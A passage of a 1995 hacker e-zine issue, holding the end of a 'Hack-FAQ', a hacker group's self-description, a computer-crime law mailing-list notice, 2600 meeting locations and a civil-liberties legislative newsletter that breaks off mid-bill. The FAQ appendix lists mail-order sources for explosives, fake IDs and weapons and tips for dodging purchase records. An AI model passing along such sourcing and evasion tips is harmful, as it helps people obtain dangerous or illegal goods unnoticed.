================================================================= ====
Apendix B. Interesting gophers:
gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu
================================================================= ====
Appendix C. Informative USENET Newsgroups
alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
Also try IRC #hack. *** WARNING: May be lame at times!!! ***
================================================================= ====
Appendix D. Publications and Catalogs
2600- a technical journal put out by hackers
mail: email:
2600 2600@well.sf.ca.us
PO Box 752
Middle Island, NY 11953
PH:516-751-2600
----------------------------------------------------------------- ----
PHRACK
The electronic journal of hackers and phreakers.
Email: phrack@well.sf.ca.us
----------------------------------------------------------------- ----
Books
APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.
Davis, Tenney L.: "Chemistry of Powder and Explosives."
Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)
Russell: "Computer Security Basics"
Cornwall: "The (New) Hacker's Handbook"
"Cyberpunk" (forget the authors)
----------------------------------------------------------------- ----
Lockpicks
(from Belisarius)
American Systems
2100 Roswell Road
Suite 200C-223
Marietta, GA 30062
Lock Pick Sets
--------------
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.
Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.
Superior ($79.80):
32 pix, wrenches,extractor. Hand finished leather case.
----------------------------------------------------------------- ----
Explosives and other underground stuff
Loompanics is one of the major distributers of material relating to
the underground including explosives. You can get the catalogue by
mailing:
Loompanics Unlim
P.O. Box 1197
Port Townsend, Wash 98368
----------------------------------------------------------------- ----
Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)
NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA 71135-5950
Phone: (318) 688-1365 FAX: (318) 688-1367
NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic sureillance stuff.
----------------------------------------------------------------- ----
Weapons, explosives, survival gear.
(from CyberSorceror)
Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO 80439
(303) 277-0305
Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you'd ever have time to read.
----------------------------------------------------------------- ----
Chemicals and lab equipment!! Only requires SIGNATURE for proof of
age!
(from Neurophyre)
Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI 54220
Send a crisp $1 bill and a request for a catalog. Tip: Don't order
all your pyro stuff from here. They DO keep records. Be safe.
================================================================= ====
Appendix E. PGP keys
Belisarius:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2
mQCNAi1FJ1MAAAEEALPDEIrmzPazAbkJ2daYnh8fy172tMmHuMPHIMaXdHWLFGjz
+XI8fJR950EGbrMKIIqsb+Xt3qhE+aQLdyggxjUuye+jTHi+JJdNg8VsULW7FvFk
YmFrObd35gQqzu9hFbUZNFxUJaRiEcViNA8bCcjQD5Fn0x/8trRiuxrAgLolAAUR
tApCZWxpc2FyaXVz
=RxKB
-----END PGP PUBLIC KEY BLOCK-----
Neurophyre:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3
mQCrAiw8FYMAAAEE8MHUh1VdCTeNLRr9xfzivxVODmY4Xv1VOzFmA0sCH4tB6aRA
/4+R+nzkW2ZB8N8tOa0tk+S3f20lIoWWPk0M56OaNreT0LLbM9KdOHXE5XDO/mtu
mKdy98eK3fDzXp+vVyK/mo8rhIR4uLcfA1JIuvbBdLa1d/Xq7PEKvayqYXpwvxO6
gLiy72ZWI616ijPttv2QYxSqu7rNSVzEwQy1AAUTtB9Zb3VyIGZsYXYtb3Itcml0
ZSwge05ldXJvcGhpcmV9
=FXdY
-----END PGP PUBLIC KEY BLOCK-----
================================================================= ====
***************************************************************** ****
************************ END OF THE HACK-FAQ! ***********************
***************************************************************** ****
***** Therefore, determine the enemy's plans and you will know ******
***** which strategy will be successful and which will not. ******
***** -- Sun Tzu, The Art of War ******
***************************************************************** ****
***************************************************************** ****
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #3 of 9
The Pursuit of Knowledge
Notes on The Guild
by Route 9/11/95
You may have been hearing much clamor about the Guild as of late.
Maybe you haven't. It depends what circles you hang out in. This article
is here to tell you who we are and dispell any myths that may be floating
around.
[OverView]
Just what is the Guild? The Guild is a group of individuals that are,
quite simply, dedicated to the pursuit of knowledge. I started the group (see
AKA's, below) as a pet project with a friend of mine (Nihil). Actually, I
started the group as a response to several offers to join other existing
groups. I felt uneasy about most of them, and decided to go out on my own,
and do things the way *I* wanted, the first time. The result is the Guild.
At the time of this writing there are 10 members in the group. We
have had a few members step down, and one who actually just disappeared. We
have even had one person declare a vendetta against me and the Guild for his
denial of acceptance.
[Members]
Some of us are very vocal and 'high profile'. Some of us are not.
Some of us are constant alt.2600 denizens. Some of us do not wish to wade
through such a high traffic group, and prefer others. Some of us only
get online to check email. Some of us are industry professionals, some of us
are students. Some are both. We are of all different backgrounds, talents
and interests. The diversity is the beauty of it all. If we all came from
the same walks of life, did the same things, and liked the same things, we'd
be pretty useless as a group (we'd also be pretty boring). The fact that we
are so diverse and the fact that we *can* organize under a common goal is
saying something right there.
To become a Guild member, all one has to do is fill out the
application you will find at my ftpsite (see URL's below). It is then voted
on by all the current members (Founding members get two votes). We are
rather discriminating, and turn down many people. We do not wish to get too
large, and we do not wish to induct just anyone. It's hard to put a
qualifier on just what we are looking for in members. It's partly what hard
facts we see on the app, and partly gut feeling. If you are serious, feel
free to fill one out, we are always glad to see new applications.
[Axoims]
The creeds we gather under are the following, in order:
1) The pursuit of knowledge
The active and absolute pursuit of gainful and enlightening
information.
2) The right to privacy
The right to be left alone, the right to actively pursue this
privacy through encryption, obscurity, or whatever means
necessary.
3) The right of individualism
The right to stand out in a crowd and show that you are
different, and proud of it. Also, the right to stand on your
own, take responsibility for yourself, and not drop a dime on
your friends and peers, should a three-letter agency press
you.
4) The destruction of ignorance
The dissemination, through discretion, of the acquired
knowledge. The correcting of obvious wrongs of others, and the
ability to concede that you were wrong after evidential proof
of falsehood is provided.
5) The support of fellow members
The supporting, through whatever means necessary, of fellow
members of the Guild.
[Goals and Views]
What are ends to which we gather under? It was my original goal to
get a bunch of people with similar interests together and exchnage thoughts
and ideas. That was my original intent. It has grown beyond that. These
past few months have changed my orginal vision into something much grander.
Being in the Guild means something. It is being able rely on a group of
adroit people to help you out of a situation; whether it be a bit of code
you can't quite seem to get to compile, or an a pesky usenet denizen who
won't leave you alone. Being in the Guild is knowing you have some friends
out there in cyberspace. Friends you can count on. That's what it comes
down to.
One of my personal opinions is one of Freedom of Information.
Information, in it's raw and pure form, wants to be free. I am completely
hypocritical, however. I also beleive in the right to privacy. How do I
justify one to the other? It's my belief that information *does* want to be
free. It tries it's hardest to be widely recognizable and distributable. It
doesn't hide. If you have information you want kept secret, it's *your*
responsibility to make *sure* it *becomes* secret, and *stays* secret. If
there is information I really want private *I* make sure it stays private.
I am charged with it's secrecy. If it was discovered by a hacker, or by some
other means, it's *my* fault for not clipping it's wings well enough...so to
speak...Cryptogrpahy is the great enemy of Freedom of Information. It does a
damn good job of keeping it secure (if implemented correctly). So, to sum it
up, I am a firm advocate of both the Right to Privacy, and the Freedom of
Information. It all depends on what the content is, and how much you want it
secured (how well you can crush it's natural desire to be free).
[What we AREN'T]
In lieu of recent events, some people may have been confused
as to what we are and what we aren't. You should have a pretty decent idea
of what we are. Here's a couple things we AREN'T:
An information-leeching orginization that is only here to gather up
'good stuff' that we couldn't get individually.
Into carding, phreaking, or warez. Translated: we aren't into
getting arrested.
Advocates of mailbombing, usenet spamming, mass mailing-list
subscriptions, etc. Personally, I find certian denial of service
attacks rather interesting. I keep my interests confined to my own
networks and computers, however. If I crash my own computers, it's my
business. If I crash someone else's that's fucked up. We don't do
that. It's childish and inconsisderate, to say the least.
[The Infinity Concept]
The Infinity Concept is our electronic zine. We try to publish it
seasonally...We try that is....It is the personification of creeds 1 and 4.
It is our way of widely disseminating information and aquired knowledge.
Our next issue should be out by mid-October.
It can be found at any of our URL's...
[AKA's]
This roster is current as of 9/4/95
Name AKA Address Joined
----------------------------------------------------------------- ----
Route (Infinity) daemon9@netcom.com Founding
Nihil (Scribe) nihil@nwlink.com Founding
Carbonboy (Scott Walters) carbon@inforamp.net May 1995
Squidge (Timothy R. Matthews) T.R.Matthews@bradford.ac.uk June 1995
Mythrandir(Jeff Thompson) jwthomp@uiuc.edu June 1995
deliryum (Deliryum) deliryum@cdc.net July 1995
Alhambra (Jeremy Rauch) alhambra@jhu.edu July 1995
MrZippy (Robert Fries) rpfries@interaccess.com July 1995
Cheshire (Justin Larue) cheshire@nether.net Aug 1995
[URL's]
url ftp://ftp.netcom.com/pub/da/daemon9/"__the Guild__"
url http://homepage.interaccess.com/~rpfries
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #4 of 9
_ _____ _____
| | /\ / ____| / ____|
| | / \ | | | |
| | / /\ \ | | | |
| |____ / ____ \ | |____ | |____
|______| /_/ \_\ \_____| \_____|
Legal Aspects of Computer Crime
"echo subscribe lacc|mail lacc-request@suburbia.net"
REASONS FOR INCEPTION
---------------------
The growing infusion of computers and computing devices into society
created a legislative and common law vacuum in the 1980's. State
prosecutors attempted to apply traditional property protection and
deception laws to new technological crimes. By and large they were
successful in this endeavor. There were however a very few but well
publicized failed cases against computer "hackers" (most notable R
vs Gold - UK House of Lords).
In an atmosphere of increased government reliance on computer
databases and public fear and hostility towards computerization of
the workplace, the world's legislatures rushed to criminalize
certain types of computer use. Instead of expanding the scope of
existing legislation to more fully encompass the use of computers by
criminals, changing phrases such as "utter or write" to "utter,
write or transmit" (the former being the prosecutions undoing in the
well publicized Gold case) as had been done with the computerization
of copyright law, an entirely new class of criminal conduct was was
introduced. The computer had been seen not just as another tool that
criminals might use in committing a crime but something altogether
foreign and removed from the rest of society and established Law.
The result was a series of nievely drafted, overly broad and
under-defined statutes which criminalized nearly all aspects of
computer use under certain conditions.
In the the 1990's a fundamental and evolving shift in computer usage
has started to occur. At work it is rare now to see a white collar
worker not in the possession of a computer. At home over one third
of households have computer systems. The computer is no longer the
"altogether foreign and removed from the rest of society" device it
once was. It has come out of the domain technical specialist and
into the main stream.
Even our notoriously slow moving legal profession is adopting it as
an essential tool. But there is another change. A qualitative one
important to our discussion.
When you connect hundreds of thousands of computers and thus the
people that use them together you find something remarkable occurs.
An event that you could never have predicted by merely summing the
discrete components involved. A unique virtual society forms. Despite
being designed with computer networking in mind computer crime
legislation copes very poorly with non homogeneous authorization.
Societies are based around a common knowledge of history, beliefs,
and current events. Each member of a society can be pinpointed as
belonging to the society in question by the ideas, beliefs and
knowledge they hold in common with its other members. Any new member
to a society learns this knowledge only because it is passed onto
them; directly by other members or indirectly via its media, works of
literature or observation.
Successful large scale computer networks like the Internet form for
one reason and one reason only; information sharing. When a critical
mass of diversity, interests, user population and information exchange
is reached, a situation develops that mirrors in all important
aspects a vibrant and evolving society. Members of these computer
network societies have nearly equal ability to convey their thoughts
to other members and do so in a timely manner without unwanted
distortion. This is a remarkably democratic process compared to the
very real self censorship and top heavy direction that is so
manifest in traditional broadcast and publishing industries.
But unlike the physical societies that have here-to been the norm,
the electronic network society is not isolationist. It continues to
draw from, mesh and feed its beliefs into the traditional societies
it was populated out of. This coupling process between computer
networks and traditional societies is expected to continue - at
least for English speaking countries, until a stage is reached were
it is difficult to find any boundary between the two.
The majority of citizens will then fall most completely under the
gamut of the appalling drafted computer crimes legislation many
times every day of their lives. In the vast majority of legislation
directed to address computer crime everything which can be performed
on a computer unless "authorized" is defined as illegal. Granted an
individual can authorize themselves to do anything they wish with
their own computer, but in a networked topology a typical computer
user may use or otherwise interact with hundreds or even thousands
of other peoples computers in any given day. In Law it has
previously been the case that which was not expressly forbidden was
permitted. Currently the digital equivalent of moving a chair is
illegal and carries with it in most countries a 5 to 10 year prison
term. It is a sad reflection on the legislature of the day that the
computer medium was criminalized rather than the intent or damage to
to the victem.
It is unlikely that law reform will occur until current political
concern over computer networks such as the Internet is moderated. If
anything the push so far from political drafters has being to once
again introduce brand new medium criminalizing legislation rather
than revitalizing the existing codes. This unfortunate "labeled
arrow" approach will continue as long as there exists an ill
informed and technologically ignorant legislature that finds itself
pliant to the whims of sensationalist media and honed to their
dubious targets.
So ill defined and over broad are the terms used in computer crime
legislation that in most western countries pressing a button on a
silicon wrist watch without permission can be construed as
"insertion of data into a computer without authority" an offence
which carries 10 years penalty in some countries.
It is however within the above unfortunate lack of appropriate
legislation, precedents and judicial guidance that judiciary,
practitioners, prosecutors, law enforcement personnel and drafters
of future codes have to struggle to find resolution.
This list has been created in an attempt to mitigate the lack of
tangible resources people involved with computer crime have at their
disposeal. It is hoped that by bringing together knowledgeable legal
professionals together with para-legal personnel and informed lay
persons that information and resources relevant to the difficult
task of analyzing, presenting in court or otherwise dealing with
computer crime law and computer crimes may be shared and intelligent
discussion stimulated.
nb. this list it is also an appropriate forum to discuss computerized
legal, law enforcement and criminology databases, such as Netmap,
Watson, PROMIS, Lexis, APAIS, CRIM-L, et cetera.
GUIDELINES
----------
In order to keep the semantic content high on this list, please consult
the following before posting:
DO POST DON'T POST
------- ----------
Un/reported decisions. Personal insults.
Commentaries on cases. Signatures >4 lines.
Reviews on relevant books. Quoted replies with more than 30%
Relevant journal articles. quoted from the original.
Information about proposed legislation. Short questions, or questions which
Full text of CC legislation. otherwise do not convey useful
Judicially defined terms. information in their own right.
Articles on new arrests or Gossip about the moderator.
cases. Articles about computer (in)security,
Detailed questions. they should be sent to:
Intelligent commentary. "best-of-security@suburbia.net"
Personal experiences with computer "breaking into a computer is the same
crime. as...."
Very well thought out analogies. Petitions (if you think they are
Relevant transcripts. exceptionally relevant, send them to
Defence or prosecution strategy. the moderator, who may post them).
Relevant papers, thesis. Chain letters.
Conference announcements and details. Advertising material.
Locations of legal resources. Ethical considerations that are only
Computer forensics information. "opinion".
Trial/court dates, verdicts etc. Content free news reports or
Reviews of legal software. articles.
Pointers to any of the above. Abusive, antagonistic or otherwise,
Cross post relevant information from non information rich or constructive
other lists or news groups. phrases.
Relevant affidavits, court documents. Quotes from Dan Quayle.
SUBSCRIBING
-----------
Send mail to:
lacc-request@suburbia.net
with the body of:
subscribe lacc
UNSUBSCRIBING
-------------
Send mail to:
lacc-request@suburbia.net
with the body of:
unsubscribe lacc
POSTING
-------
To send a message to the list, address it to:
lacc@suburbia.net
REPLYING
--------
If you are replying to a message already on the LACC list using your
mail programs reply facility you will almost certainly have to change
the reply address to lacc@suburbia.net. This is because the LACC mailing
list program is configured to have return replies sent no "nobody" in
order to avoid receiving the replies of "vacation" programs which
automatically send email saying "I've gone to the moon for two weeks to
hunt rare bits".
--
+----------------------------------+----------------------------- ------------+
| Julian Assange | "if you think the United States has |
| | has stood still, who built the largest |
| proff@suburbia.net | shopping centre in the world?" - Nixon |
+----------------------------------+----------------------------- ------------+
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File#5 of 9
2600 MEETINGS
North America
Ann Arbor, MI
Galleria on Souh University
Austin
Northcross Mall, across the skating rink from the food court, next
to Pipe World.
Baltimore
Baltimore Inner Harbor, Harborplace Food Court, Second Floor,
across
from the Newscenter, Payphone: (410) 547-9361.
Baton Rouge, LA
In The LSU Union Building, between the Tiger Pause and Swensen's
Ice Cream, next to the payphone. Payphone numbers:(504) 387-9520
9520, 9538, 9618, 9722, 9733, 9735.
Bloomington, MN
Mall of America, north side food court, across from Burger King
and
the bank of payphones that don't take incoming calls.
Boise, ID
Student Union building at Boise State University near payphones.
Payphone number:(208) 342-9432, 9559, 9700, 9798
Boston, MA
Prudential Center Plaza, Terrace Food Court, Payphones:(617) 236-
6582, 6583, 6584, 6585.
Chicago, IL
3rd Coast Cafe, 1260 North Dearborn.
Cincinnati
Kenwood Town Center, food court.
3 Clearwater, FL
Clearwater Mall, near the food court. Payphones:(813) 796-9706,
9707, 9708, 9813.
Cleveland
CoventryAraica in Cleveland Heights
Dallas
Mama's Pizza, northeast corner of Campbell Rd. and Preston Rd. in
North Dallas, first floor of the two story strip section. 7pm.
Payphone:(214) 931-3850.
Danbury, CT
Danbury Fair Mall, off Exit 4 of I-84, in food court. Payphones:
(203) 748-9995
Hazelton, PA
Lural Mall in the new section by phones. Payphones:(717) 454-9236,
9246,9365.
4 Houston
Galleria Mall, 2nd story overlooking the skating rink.
Kansas City
Foor Court at the Oak Park Mall in Overland Park, Kansas.
Los Angeles
Union Station, corner of Macy & Alameda. Inside main entrance by
bank of phones. Payphones:(213) 972-9358,9388, 9506, 9519, 9520,
625-9923, 9924; 614-9849, 9872, 9918, 9926.
Louisville, KY
The Mall, St. Matthew's food court.
Madison, WI
Union South (227 S. Randall St.) on the main level by the
payphones
Payphones: (608) 251-9746, 9914, 9916, 9923.
Nashville
Bellevue Mall in Bellevue, in the food court.
New York City
Citicorp Center, in the loby, near the payphones, 153 E 53rd St.,
between Lexington & 3rd. Payphones: (212) 223-9011, 8927; 308-
8044, 8162
Ottawa, ONT (Canada)
Cafe Wim on Sussex, a block down from Rideau Street. 7pm.
Philadephia
30th Streek Amtrak Station at 30th & Market, under the "Stairwell
7"
sign. Payphones (215) 222-9880, 9681, 9779, 9799, 9632; 387-9751.
Pittsburgh
Parkway Center Mall, south of downtown, on Route 279. In the food
courth. Payphone: (412)928-9926, 9927, 9934.
Portland, OR
Lloyd Center Mall, second leavel at the food court.
6 Poughkeepsie, NY
South Hills Mall, off Route 9. By the payphones in front of Radio
Shack, next to the food court.
Raleigh, NC
Crabtree Valley Mall, food court.
Rochester, NY
Marketplace Mall food court.
St. Louis
Galleria, Highway 40 and Brentwood, lower level, food court area,
by the theatres.
Sacramento
Downtown Plaza food court, upstairs by the theatre. Payphones:
(916) 442-9543, 9644.
San Fransico
4 Embarcadero Plaza(inside). Payphones: (415) 398-9803, 9804,
9805, 9806.
Seattle
Washinton State Covention Center, first floor. Payphones: (206)
220-9774, 9775, 9776, 9777.
Washington DC
Pentagon City Mall in the food court.
Europe & South America
Buenos Aires, Argetina
In the bar at San Jose 05.
London, England
Trocadero Shopping Center (near Picadilly Circus)next to VR
machines. 7pm to 8pm.
Munich, Germany
Hauptbahnhof (Central Station), first floor, by Burger King and
the
payhpones.(one stop on the S-Bahn from Hackerbruecke -
Hackerbridge!) Birthplace of Hacker-Pschorr beer. Payphones: +49-
89-591-835. +49-89-558-541, 542, 543, 544, 545.
Granada, Spain
At Kiwi Pub in Pedro Antonio de Alarcore Street.
Halmstad, Sweden
At the end of the town square(Stora Torget), to the right of the
bakery
(Tre Hjartan). At the payphones.
All meetings take place on the first Friday of the month from
approximately 5pm to 8pm local time unless otherwise noted. To start
a meeting in your city, leave a message and phone number at
(516)751-2600, or send email to: meetings@2600.com
This PHiLe courtesy of the 2600 Web Site
FuSIoN
----------------------------------------------------------------- -------------
T H E C R i M E S Y N D i C A T E
NPi/TcS/SUi
fu-sion \'fyu-zhen\ n, the union of atomic nuclei resulting in the
release of enormous quantities of energy when certain light elements unite.
----------------------------------------------------------------- -------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #6 of 9
================================================================= ==========
BillWatch 18
VTW BillWatch: A weekly newsletter tracking US Federal legislation
affecting civil liberties. BillWatch is published every
Friday evening as long as Congress is in session.
Congress is: in session
Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995
Please widely redistribute this document with this banner intact
Redistribute no more than two weeks after above date
Reproduce this alert only in relevant forums
Distributed by the Voters Telecommunications Watch (vtw@vtw.org)
_________________________________________________________________ __________
TABLE OF CONTENTS
'-' denotes quiet issue (no movement this week)
'+' denotes movement this week on an issue
'++' denotes movement this week with an action for YOU to do
+ Summary of Internet Censorship legislation
+ Changes in US policy on cryptography
Review of workshop at NIST Sep 15th
Text of ACLU position on encryption
Status: "Clipper II" ramrodding is progressing
- HR1978, S n.a. (Internet Freedom and Family Empowerment Act)
Status: In conference
- HR1004, S314 (1995 Communications Decency Act)
Status: In conference
- HR n.a., S714 (Child Protection, User Empowerment, and Free
Expression in Interactive Media Study Act)
Status: In conference
- Last-minute provisions of the Manager's Mark amendment to HR1555
Status: In conference
- HR n.a., S892 (Protection of Children from Computer Pornography Act)
Status: In committee
- HR n.a., S974 (Anti-Electronic Racketeering Act)
Status: In committee
+ HR n.a., S1237 (Child Pornography Prevention Act
Text of S1237
Statement of introduction of S1237 (Hatch)
Status: In committee (Judiciary)
- Subscription Information
_________________________________________________________________ __________
SUMMARY OF INTERNET CENSORSHIP LEGISLATION
The four different pieces of legislation that address Internet regulation
are still waiting for conference committee consideration. With the budget
as the current Congressional priority, it isn't likely the fate of the
Internet will be considered for several weeks.
VTW is still collecting the signatures of businesses and bulletin boards
that wish to participate in the joint letter to be sent to Congress urging
parental control (instead of censorship) as a means of approaching the
Internet. VTW urges you to contact your Internet service provider along
with any business that use the Internet to signon to this letter. Details
can be found at the http://www.vtw.org/cdaletter/
or by sending mail to vtw@vtw.org with "send cdaletter" in the subject line.
_________________________________________________________________ __________
CHANGES IN US CRYPTOGRAPHY POLICY
VTW has been chronicaling the government's attempts at forcing Clipper II
onto the public and industry. Of course, it is still extremely unpopular.
At the Sep. 6th and 7th NIST workshop, industry and public interest
groups panned the plan and small working groups setup by NIST to evaluate
the criteria unhappily participated, even openly revolting in some instances.
On Sep 15th, NIST held another workshop to discuss the FIPS (Federal
Information Processing Standard) that would embody Clipper II (also
know as Commercial Key Escrow). Believe it or not, this meeting was not
a repeat of the Sep 6th/7th meeting. Several attendees noticed significant
differences:
HEIGHTENED GOVERNMENT PRESENCE
At the Sep 6th/7th workshop, dissent among industry and public
representatives interfered with NIST's attempts at having a discussion
about the specifics of Clipper II. Simply put, industry and the public
advocates didn't like the plan. Therefore discussions of the details
were fruitless. One smaller working group simply refused to work on
the details and issued a statement condemning the whole Clipper II plan.
The government upped the number of Federal participants at the Sep. 15th
meeting in order to prevent the repeat of such an event. Several public
advocates noticed a high percentage of government-provided participants in
the working groups. One civil liberties advocate noted that he had never
seen so many NSA individuals identifying themselves in public before.
Needless to say the tactic worked. Little in the way of opposition to
the plan was voiced.
BURNOUT AMONG INDUSTRY AND PUBLIC REPRESENTATIVES
Having been through this Kafka-esque exercise a mere two years ago with
the original Clipper plan, industry and public advocates are showing
signs of burnout. It's fairly clear that their concerns are not being
listened to. Both the public and the industry clearly sent a message to
the Clinton Administration when the original Clipper was proposed.
Said F. Lynn McNulty of NIST in the New York Times Magazine (6/12/94), "We
received 320 comments, only 2 of which were supportive."
NIST made the Clipper Chip a government standard anyway, and it flopped
in the marketplace. How many of those Clipper-phones do you see running
around? The government's so-called "stupid criminals" are just falling
over themselves to buy them, aren't they? NIST has stated that it has
already been decided to make Clipper II a standard, before receiving any
public input. Is this how democracy is supposed to work?
COMMERCIAL CHEERLEADING FROM SELECT INDUSTRY INDIVIDUALS
If you're wondering how the Clinton administration can get away with
pushing such a disastrous proposal again, look no further than select
members of the hardware and software industry. Several companies that
make both security software, hardware devices and several key escrow
companies are pushing Clipper II because they incorrectly believe that
the government will not make it mandatory, and because they believe
the industry wants key escrow.
VTW believes they have it half-right: industry wants key escrow, though
not on the Clinton Administration's terms. It is clear, however, that
the Administration will not allow key-escrow to be a voluntary program.
The EPIC (Electronic Privacy Information Center) has proved that the
government has enough common sense to know that key escrow is going to be
unpopular and will have to be forced on the marketplace. (See FOIA'd
documents at URL:http://www.epic.org/crypto/).
Never the less, several companies who want to produce hardware key
escrowed devices, key escrowed software, and become escrow holders have
become the champions of the Clipper II (Commercial Key Escrow)
program. With their support, VTW predicts that the Clinton
Administration will ratify Clipper II as a FIPS standard over the
objections of industry and public.
Stay tuned to BillWatch for progress on Clipper II.
_________________________________________________________________ __________
Internet Freedom and Family Empowerment Act (HR 1978, S n.a.)
*** THIS BILL IS IN CONFERENCE COMMITTEE ***
Description:
HR 1978 is an attempt to recognize the unique medium that is
online systems and avoid legislating censorship. It would:
-prohibit the FCC from regulating constitutionally-protected
online speech
-absolve sysops and services from liability if they take
good faith measures to screen their content or provide
parental-screening software
See directions below for obtaining analyses from various
organizations.
House sponsors and cosponsors: Cox (R-CA), Wyden (D-OR), Matsui (D-CA),
White (R-WA), Stupak (D-MI), Rohrabacher (R-CA)
House status:
HR 1978 was passed 8/4/95 by the House in a vote (421-4).
Where to get more info:
Email: vtw@vtw.org (with "send hr1978" in the subject line)
Gopher: gopher -p 1/vtw/exon gopher.panix.com
WWW: http://www.panix.com/vtw/exon
_________________________________________________________________ __________
1995 COMMUNICATIONS DECENCY ACT (CDA) (Passed Senate, HR 1004)
*** THIS BILL IS IN CONFERENCE COMMITTEE ***
Description:
The CDA would criminalize electronic speech currently protected
in print by the First Amendment.
House CDA sponsors: Johnson (D-SD)
House status:
HR1004 will probably never leave committee.
Senate status:
The Senate affirmed the Communications Decency Act (84-16)
as amended to the Telecommunications Reform bill (S 652).
Where to get more info:
WWW: http://www.panix.com/vtw/exon
http://www.eff.org/
http://www.cdt.org/
http://epic.org/free_speech
Gopher: gopher -p 1/vtw/exon gopher.panix.com
gopher gopher.eff.org
Email: vtw@vtw.org (with "send cdafaq" in the subject line)
cda-status@cdt.org
cda-info@cdt.org
_________________________________________________________________ __________
Child Protection, User Empowerment, and Free Expression in Interactive
Media Study Act (Amendment to HR1555 in the House, S 714)
*** THIS BILL IS IN CONFERENCE COMMITTEE ***
Description:
Would direct the Department of Justice to study whether current
law is sufficient to cover enforcement of existing obscenity
laws on computers networks.
Senate sponsors: Leahy (D-VT)
Senate status:
Currently unattached to any legislation; attempted attachment to
S.652 but failed (6/14/95).
House sponsors: Klink (D-PA)
House status:
Amended to HR 1555 in committee.
_________________________________________________________________ __________
Last-minute provisions of the Manager's Mark amendment to HR1555 (added to
HR1555 at the last minute)
*** THIS BILL IS IN CONFERENCE COMMITTEE ***
Description:
Criminalizes many forms of constitutionally-protected speech
when they are expressed online.
House sponsors: Unknown
House status:
Amended to HR 1555 through the Manager's Mark on 8/4/95.
_________________________________________________________________ __________
1995 Protection of Children from Computer Pornography Act (S 892)
Description:
Would make Internet Service Providers liable for shielding
people under 18 from all indecent content on the Internet.
Senate sponsors: Dole (R-KS), Coats (R-IN), Grassley (R-IA), McConnell (R-KY),
Shelby (R-AL), Nickles (R-OK), Hatch (R-UT)
Senate status:
A hearing was held Monday July 24th. No action on the bill
has happened yet as a result of that hearing.
_________________________________________________________________ __________
Anti-Electronic Racketeering Act of 1995 (HR n.a., S 974)
Description:
S 974 has many effects (not good) on law enforcement's use of
intercepted communications. It would also make it unlawful for
any person to publicly disseminate encoding or encrypting
software including software *currently allowed* to be exported
unless it contained a "universal decoding device". This
more than likely means that Clipper-style key escrow systems
could be disseminated, but not strong, private cryptography.
Senate sponsors: Grassley (R-IA)
Senate status: Currently not active and probably won't move before the
August recess.
Senate citizen action required:
Request bill below and familiarize yourself with it. VTW is
tracking this bill, and will alert you when there is movement.
There is no Congressional action to take right now; as other
bills (such as the Communications Decency Act) pose a greater,
more immediate threat.
House of Representatives status: No House version is currently enrolled.
Where to get more info:
Email: vtw@vtw.org (with "send s974" in the subject line)
Gopher: URL:gopher://gopher.panix.com:70/11/vtw/
_________________________________________________________________ __________
Child Pornography Prevention Act of 1995 (HR n.a., S 1237)
Description:
S 1237 would criminalize material that depicts children engaging
in sexually-explicit conduct whether or not the material was
produced with children or entirely without computer.
Senate sponsors:
Hatch (R-UT), Abraham (R-MI), Grassley (R-IA), Thurmond (R-SC)
Senate status: In the Judiciary committee, no hearing has been held yet
Senate citizen action required:
Read the bill below and familiarize yourself with it. VTW is
tracking this bill, and will alert you when there is movement.
House of Representatives status: No House version is currently enrolled.
Where to get more info:
Check URL:http://thomas.loc.gov and search for bill S1237. VTW
will have a homepage on this bill soon. We've included both
the text of the bill and Congressional debate on it below.
To amend certain provisions of law relating to child pornography,
and for other purposes.
IN THE SENATE OF THE UNITED STATES
September 13 (legislative day, September 5), 1995
Mr. Hatch (for himself, Mr. Abraham, Mr. Grassley, and Mr.
Thurmond) introduced the following bill; which was read twice
and referred to the Committee on the Judiciary
A BILL
To amend certain provisions of law relating to child pornography,
and for other purposes.
Be it enacted by the Senate and House of Representatives of the
United States of America in Congress assembled,
SECTION 1. SHORT TITLE.
This Act may be cited as the `Child Pornography Prevention Act of
1995'.
SEC. 2. FINDINGS.
Congress finds that--
(1) the use of children in the production of sexually
explicit material, including photographs, films, videos,
computer images, and other visual depictions, is a form of
sexual abuse which can result in physical or psychological
harm, or both, to the children involved;
(2) child pornography permanently records the victim's abuse,
and its continued existence causes the child victims of sexual
abuse continuing harm by haunting those children in future years;
(3) child pornography is often used as part of a method of
seducing other children into sexual activity; a child who is
reluctant to engage in sexual activity with an adult, or to
pose for sexually explicit photographs, can sometimes be
convinced by viewing depictions of other children `having fun'
participating in such activity;
(4) prohibiting the possession and viewing of child
pornography encourages the possessors of such material to
destroy them, thereby helping to protect the victims of child
pornography and to eliminate the market for the sexually
exploitative use of children; and
(5) the elimination of child pornography and the protection
of children from sexual exploitation provide a compelling
governmental interest for prohibiting the production,
